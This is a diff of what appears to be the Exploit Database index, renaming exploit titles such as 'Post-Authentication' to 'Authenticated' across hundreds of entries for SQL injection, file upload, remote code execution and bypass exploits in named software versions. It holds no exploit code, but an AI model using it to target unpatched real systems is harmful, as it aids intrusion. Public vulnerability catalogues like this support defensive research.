 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for E-Business - Directory Traversal",2010-12-24,anonymous,linux,remote,0
 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0
-35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Pre-Authentication SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
+35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) - 'Patch' DLM",2014-11-03,Metasploit,hardware,remote,9100
 35153,platforms/osx/dos/35153.c,"Apple Mac OSX (Mavericks) - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0
 35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0
@@ -31941,7 +31949,7 @@ id,file,description,date,author,platform,type,port
 35438,platforms/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0
 35439,platforms/php/webapps/35439.txt,"WordPress Nextend Facebook Connect Plugin 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80
 35440,platforms/osx/local/35440.rb,"Apple Mac OSX - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0
-35441,platforms/multiple/remote/35441.rb,"Tincd - Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655
+35441,platforms/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655
 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0
 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80
 35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0
@@ -32109,7 +32117,7 @@ id,file,description,date,author,platform,type,port
 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos,0
 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0
 35624,platforms/php/webapps/35624.txt,"phpList 3.0.6 / 3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps,0
-35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Post-Authentication SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0
+35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0
 35626,platforms/php/webapps/35626.txt,"Easy File Sharing WebServer 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0
 35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0
 35630,platforms/php/webapps/35630.txt,"Joomla Component - 'com_phocadownload' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
@@ -32134,7 +32142,7 @@ id,file,description,date,author,platform,type,port
 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0
 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0
 35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0
-35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authentication Remote Code Execution",2014-12-30,drone,windows,remote,0
+35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution",2014-12-30,drone,windows,remote,0
 35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0
 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0
 35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos,0
@@ -32315,7 +32323,7 @@ id,file,description,date,author,platform,type,port
 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change",2015-02-05,"Todor Donev",hardware,remote,0
 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0
 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0
-35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080
+35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated Arbitrary File Upload",2015-01-20,Metasploit,java,remote,8080
 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
 35847,platforms/osx/local/35847.c,"Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0
 35848,platforms/osx/local/35848.c,"Apple Mac OSX 10.9.5 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0
@@ -32420,8 +32428,8 @@ id,file,description,date,author,platform,type,port
 35944,platforms/php/webapps/35944.txt,"Chyrp 2.x - includes/JavaScript.php action Parameter Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0
 35945,platforms/php/webapps/35945.txt,"Chyrp 2.x - URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0
 35946,platforms/php/webapps/35946.txt,"Chyrp 2.x - includes/lib/gz.php file Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0
-35947,platforms/php/webapps/35947.txt,"Chyrp 2.x - swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0
-35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - (Full ASLR + DEP Bypass)",2015-01-30,Rh0,windows,remote,0
+35947,platforms/php/webapps/35947.txt,"Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0
+35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass)",2015-01-30,Rh0,windows,remote,0
 35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0
 35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80
 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 glibc gethostbyname - Denial of Service",2015-01-29,1n3,linux,dos,0
@@ -32644,7 +32652,7 @@ id,file,description,date,author,platform,type,port
 36199,platforms/linux/remote/36199.txt,"Perl 5.x - Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,linux,remote,0
 36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0
 36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0
-36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80
+36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80
 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0
 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 - PHPrint.php Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0
 36205,platforms/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
@@ -32653,7 +32661,7 @@ id,file,description,date,author,platform,type,port
 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0
 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0
 36262,platforms/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0
-36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection",2015-03-04,Metasploit,linux,remote,443
+36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Authenticated Command Injection",2015-03-04,Metasploit,linux,remote,443
 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service",2011-04-11,"Luigi Auriemma",windows,dos,0
 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0
 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
@@ -33074,7 +33082,7 @@ id,file,description,date,author,platform,type,port
 36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 - contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
 36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - Interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0
 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667
-36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload and Execution",2015-04-06,Metasploit,jsp,remote,8080
+36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution",2015-04-06,Metasploit,jsp,remote,8080
 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
@@ -33111,7 +33119,7 @@ id,file,description,date,author,platform,type,port
 36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 - switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0
 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0
 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0
-36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000
+36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000
 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80
 36692,platforms/osx/local/36692.py,"Apple Mac OSX < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
 36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0
@@ -33174,7 +33182,7 @@ id,file,description,date,author,platform,type,port
 36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
 36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
 36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
-36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0
+36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0
 36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80
 36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation (Remote Code Execution)",2015-04-14,LiquidWorm,php,webapps,80
 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0
@@ -33363,7 +33371,7 @@ id,file,description,date,author,platform,type,port
 36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin 4.2.4 - Cross-Site Request Forgery",2015-05-08,Evex,php,webapps,80
 36955,platforms/osx/remote/36955.py,"MacKeeper - URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0
 36956,platforms/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free",2015-05-08,Metasploit,windows,remote,0
-36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload and Execution",2015-05-08,Metasploit,php,remote,80
+36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload / Execution",2015-05-08,Metasploit,php,remote,80
 36958,platforms/php/webapps/36958.txt,"WordPress Ultimate Profile Builder Plugin 2.3.3 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80
 36959,platforms/php/webapps/36959.txt,"WordPress ClickBank Ads Plugin 1.7 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80
 36960,platforms/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",windows,webapps,8080
@@ -33533,7 +33541,7 @@ id,file,description,date,author,platform,type,port
 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0
 37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps,0
 37138,platforms/php/webapps/37138.txt,"Ramui Forum Script - 'query' Parameter Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0
-37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass",2012-05-07,L3b-r1'z,php,webapps,0
+37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Bypass",2012-05-07,L3b-r1'z,php,webapps,0
 37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps,0
 37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router - Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote,0
 37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC - plugins/ajaxCalls/haltResumeHsp.php hspSummaryId Parameter SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0
@@ -33608,7 +33616,7 @@ id,file,description,date,author,platform,type,port
 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0
 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0
 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0
-37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
+37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0
 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0
 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0
@@ -33919,7 +33927,7 @@ id,file,description,date,author,platform,type,port
 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0
 37568,platforms/windows/dos/37568.pl,"VLC Media Player - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0
 37569,platforms/multiple/webapps/37569.txt,"ntop - 'arbfile' Parameter Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0
-37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0
+37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Remote Authenticated Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0
 37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0
 37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0
 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0
@@ -34074,7 +34082,7 @@ id,file,description,date,author,platform,type,port
 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
 37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0
 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80
-37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
+37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
 37747,platforms/windows/dos/37747.py,"Havij Pro - Crash (PoC)",2015-08-10,i_7e1,windows,dos,0
 37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80
@@ -34155,7 +34163,7 @@ id,file,description,date,author,platform,type,port
 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0
 37809,platforms/php/webapps/37809.php,"Nuts CMS - Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80
 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0
-37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80
+37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Authenticated Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80
 37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution",2015-08-18,Metasploit,win_x86,remote,8443
 37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH)",2015-08-18,Metasploit,windows,local,0
 37814,platforms/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution",2015-08-18,Metasploit,python,remote,0
@@ -34271,9 +34279,9 @@ id,file,description,date,author,platform,type,port
 37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
 37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
 37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass Issue",2015-08-21,"Anastasios Monachos",php,webapps,0
-37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
+37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
 37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
-37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
+37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
 37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin - Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0
 37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0
@@ -34307,7 +34315,7 @@ id,file,description,date,author,platform,type,port
 37980,platforms/windows/dos/37980.pl,"Microsoft Excel - Denial of Service",2012-10-11,"Jean Pascal Pereira",windows,dos,0
 37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,windows,dos,0
 37982,platforms/hardware/remote/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,remote,0
-37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Security Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0
+37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0
 37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,windows,dos,0
 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80
 37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow",2015-08-27,Un_N0n,windows,dos,0
@@ -34324,7 +34332,7 @@ id,file,description,date,author,platform,type,port
 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,ios,dos,3030
 37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80
 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
-38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload and Execution",2015-08-28,"Narendra Bhati",php,webapps,80
+38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload / Execution",2015-08-28,"Narendra Bhati",php,webapps,80
 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
@@ -34556,7 +34564,7 @@ id,file,description,date,author,platform,type,port
 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0
 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0
 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21
-38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Post-Authentication CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21
+38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21
 38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80
 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash (PoC)",2015-09-22,VIKRAMADITYA,windows,dos,0
 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21
@@ -34701,7 +34709,7 @@ id,file,description,date,author,platform,type,port
 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0
 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0
 38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
-38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass)",2015-10-06,"Raffaele Forte",php,webapps,0
+38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0
 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
 38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0
@@ -34740,7 +34748,7 @@ id,file,description,date,author,platform,type,port
 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0
